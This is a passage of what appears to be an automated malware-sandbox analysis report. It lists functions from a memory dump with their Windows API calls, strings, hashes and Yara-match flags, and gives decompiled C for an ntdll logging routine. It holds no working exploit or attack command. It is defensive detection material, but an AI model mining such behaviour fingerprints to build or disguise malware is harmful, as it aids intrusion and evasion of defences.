                                                                            • Instruction ID: 8586751b7d5df052cfe2f3008fd002b1e2241984b0c3f7a2164708ab88ccf283
                                                                            • Opcode Fuzzy Hash: 7393839b805bd5084353893736b0528511b6a686f4d31da60a7ca82527479c4d
                                                                            • Instruction Fuzzy Hash: BE9002A161181042F600656A4D14B07000597D0357FA1C116A4145554CCA59D861A561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001388D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00133546,?,00133CBF,00133CBF,?,00133546,?,?,?,?,?,00000000,00000000,?), ref: 001388CD
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123B93), ref: 0013890D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateFree
                                                                            • String ID: .z`
                                                                            • API String ID: 2488874121-1441809116
                                                                            • Opcode ID: 2f827f31ae371fa4ea9431c39925cfed47eed1130b3f7c0e83622d540b5cfca8
                                                                            • Instruction ID: e2e6dd61b055723c16bc03052ecd5d20e21d34369fed2a121517434083a919dd
                                                                            • Opcode Fuzzy Hash: 2f827f31ae371fa4ea9431c39925cfed47eed1130b3f7c0e83622d540b5cfca8
                                                                            • Instruction Fuzzy Hash: B3F0AFB2210208AFDB15EF58DC45EE733A8EF88350F018599FD0897341E630EA10CBB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001372F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 00137398
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: e6b6d76fb8c3ac1ebd78e041b040210f11e6452b6bf4cfdea29207152aa175e0
                                                                            • Instruction ID: 367695ecef6e8672259d10479621274155c38e9226bb8a0a9afcd94a1cd2722b
                                                                            • Opcode Fuzzy Hash: e6b6d76fb8c3ac1ebd78e041b040210f11e6452b6bf4cfdea29207152aa175e0
                                                                            • Instruction Fuzzy Hash: 643190B6505604ABC725DF64C8A1FABB7B8BF48700F00811DFA5A9B281D770B545CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001372E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 00137398
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: ed2570ab7d7bda300e57c0a487e79db1578b41e852dd5edf2055fcd53666af29
                                                                            • Instruction ID: b8ae2793f73c1cc9443a582387cf9813ffd8f95d03a97f89cc9a068f2f98b4b6
                                                                            • Opcode Fuzzy Hash: ed2570ab7d7bda300e57c0a487e79db1578b41e852dd5edf2055fcd53666af29
                                                                            • Instruction Fuzzy Hash: 1721D0B6605605ABC721DF64C8A1FABB7B4FF88700F108019FA1D9B281D770B845CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001388E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123B93), ref: 0013890D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction ID: 02fce323a31526501b00d04c1dbf1779d43ffa8b1c2e96febcff0c688fd13df5
                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction Fuzzy Hash: A0E04FB12002086BD718EF59CC49EA777ACEF88750F014554FD0857241C670F910CAF0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00127290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001272EA
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0012730B
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                                                            • Instruction ID: 5f8c8307c4180381a4232d5d0bb555115c503953df9c56c0e6c3bdcf1d32ba7f
                                                                            • Opcode Fuzzy Hash: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                                                            • Instruction Fuzzy Hash: 3A01A231A8022877E721AA94AC03FBF776CAF10B51F140118FF04BA1C1E7946A1647F6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00133420, Relevance: 1.7, APIs: 1, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: e97bb7bfa8af3a1fba76055c85b947bfe6d9ae3a7a548c0e590cc1130015f449
                                                                            • Instruction ID: 6f721b8ea9f1a26d37eb5c737b7cc8c1b3a6b730b24cce9c9037ac87dce762d0
                                                                            • Opcode Fuzzy Hash: e97bb7bfa8af3a1fba76055c85b947bfe6d9ae3a7a548c0e590cc1130015f449
                                                                            • Instruction Fuzzy Hash: E67176B6E00218AFDB10DF9CDC82AFEB7B8EB59314F10455AF918E7241E7315E118BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00129B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00129BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                            • Instruction ID: d37a02f21a539f981594fc185e94910f1569c55da0466355d8a1d384bde62d52
                                                                            • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                            • Instruction Fuzzy Hash: B6011EB5D0020DABDB10DAA5EC82FDDB7789B54308F0041A5E90897241F771EB18CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00138950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001389A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction ID: 37b3159acca293f51563f8b6ac0b9785d5c894af4630524ae92de6e9834ba57c
                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction Fuzzy Hash: 5201B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0013894D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001389A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 8c83c7642f93f5f614a0161620f1223421d22337f83b039141abbaee908fa446
                                                                            • Instruction ID: 4033759429c523572f382e06f6108a2663aa6bd1c35f2d06c309f7c324bddbe7
                                                                            • Opcode Fuzzy Hash: 8c83c7642f93f5f614a0161620f1223421d22337f83b039141abbaee908fa446
                                                                            • Instruction Fuzzy Hash: 7F01A4B2204108AFCB54DF89DC80EEB37A9AF8C354F158258BA0DD7250C630E851CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00129B43, Relevance: 1.5, APIs: 1, Instructions: 42libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00129BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 06ec5ad617f0480dac7ab3218ad283f91d90700fe353b1101687e29cdd682e72
                                                                            • Instruction ID: 02691440d9b369395888dad7d542f2324685c964f5d97f4eba2fb468b37b75c1
                                                                            • Opcode Fuzzy Hash: 06ec5ad617f0480dac7ab3218ad283f91d90700fe353b1101687e29cdd682e72
                                                                            • Instruction Fuzzy Hash: EEF0A4B2E4011EABCF00DA94E842FDCB778DB50304F0082A5E91C9B290F771EA15C781
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00137420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0012CD00,?,?), ref: 0013745C
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 51ba582e3e911b42fa11c135c165df8541740ea8ef473cff33f2ac28b774aa9f
                                                                            • Instruction ID: 202ebb40ae981df217202370be569ccce9e4835c12653e77a1fc7017d609c4b1
                                                                            • Opcode Fuzzy Hash: 51ba582e3e911b42fa11c135c165df8541740ea8ef473cff33f2ac28b774aa9f
                                                                            • Instruction Fuzzy Hash: B2E09A733803143AE33065ADAC03FA7B39CCB91B31F14002AFA0DEB2C1DA95F90142A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001388A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00133546,?,00133CBF,00133CBF,?,00133546,?,?,?,?,?,00000000,00000000,?), ref: 001388CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction ID: cb24b9cd0f6d84dd82029f9a6a0fee95ba842801c506f15c61d7a584c0be69df
                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction Fuzzy Hash: 13E046B1200208ABDB18EF99CC45EA777ACEF88760F118558FE086B242C670F910CBF0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00138A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0012CFD2,0012CFD2,?,00000000,?,?), ref: 00138A70
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction ID: d69d44bd8629a28705e9956e436d078c4d796f640a7dd2f0ef6c7840506e8484
                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction Fuzzy Hash: C4E01AB12002086BDB14EF49CC85EE737ADAF88650F018154BE0867241CA70E8108BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0012D438, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00127C93,?), ref: 0012D46B
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 2af872b58be13a52528e5bf053726f9852ba35b549a49072cbee02cf5190a086
                                                                            • Instruction ID: 261e9ea8cdb17fc7f34647c14da6f882b204c731901d9ad192fe8a136e472cbd
                                                                            • Opcode Fuzzy Hash: 2af872b58be13a52528e5bf053726f9852ba35b549a49072cbee02cf5190a086
                                                                            • Instruction Fuzzy Hash: 94D097943BC3453FE711BAB03E03F1326480B40380F490AA8B44DEF1C3DA4CC5280139
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0012D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00127C93,?), ref: 0012D46B
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                            • Instruction ID: f5103afeb7a6cc5ba4de6b7e6b3dadc5855776195e5bf64d559714993df7e2cc
                                                                            • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                            • Instruction Fuzzy Hash: 89D0A7717503087BE610FAA8EC03F2632CC5B54B10F494074F949D73C3DB64F5004165
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0441967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b27c56f2cb163bad124b299b44d230b1f6d7be1a7622c0ea0dd0d65b073f0118
                                                                            • Instruction ID: 1da434847ac5c3b127de69252b2d07f7b9f635fd3f5061f1f0127f2ca32984de
                                                                            • Opcode Fuzzy Hash: b27c56f2cb163bad124b299b44d230b1f6d7be1a7622c0ea0dd0d65b073f0118
                                                                            • Instruction Fuzzy Hash: 39B092F2D425D5CAFF11EBA14B08B2B7A00BBD0755F66C063E2020692A477CE091F6B6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0446FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 53%
                                                                            			E0446FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0441CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04465720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04465720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                            0x0446fdda
                                                                            0x0446fde2
                                                                            0x0446fde5
                                                                            0x0446fdec
                                                                            0x0446fdfa
                                                                            0x0446fdff
                                                                            0x0446fe0a
                                                                            0x0446fe0f
                                                                            0x0446fe17
                                                                            0x0446fe1e
                                                                            0x0446fe19
                                                                            0x0446fe19
                                                                            0x0446fe19
                                                                            0x0446fe20
                                                                            0x0446fe21
                                                                            0x0446fe22
                                                                            0x0446fe25
                                                                            0x0446fe40

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0446FDFA
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0446FE2B
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0446FE01
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                            • API String ID: 885266447-3903918235
                                                                            • Opcode ID: b6886bd982c9d04834939a21fd6b9ea34fb4d5be972c8b09e120f86d4b0d5abb
                                                                            • Instruction ID: 599ec39127fc14e1220557ff3599bdcd52e2c9497d55b76ce2b338e130095068
                                                                            • Opcode Fuzzy Hash: b6886bd982c9d04834939a21fd6b9ea34fb4d5be972c8b09e120f86d4b0d5abb
                                                                            • Instruction Fuzzy Hash: 73F0C232640601BBEB201A46EC02E23BF5AEB44730F14421AF668565E1EA62B82097A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%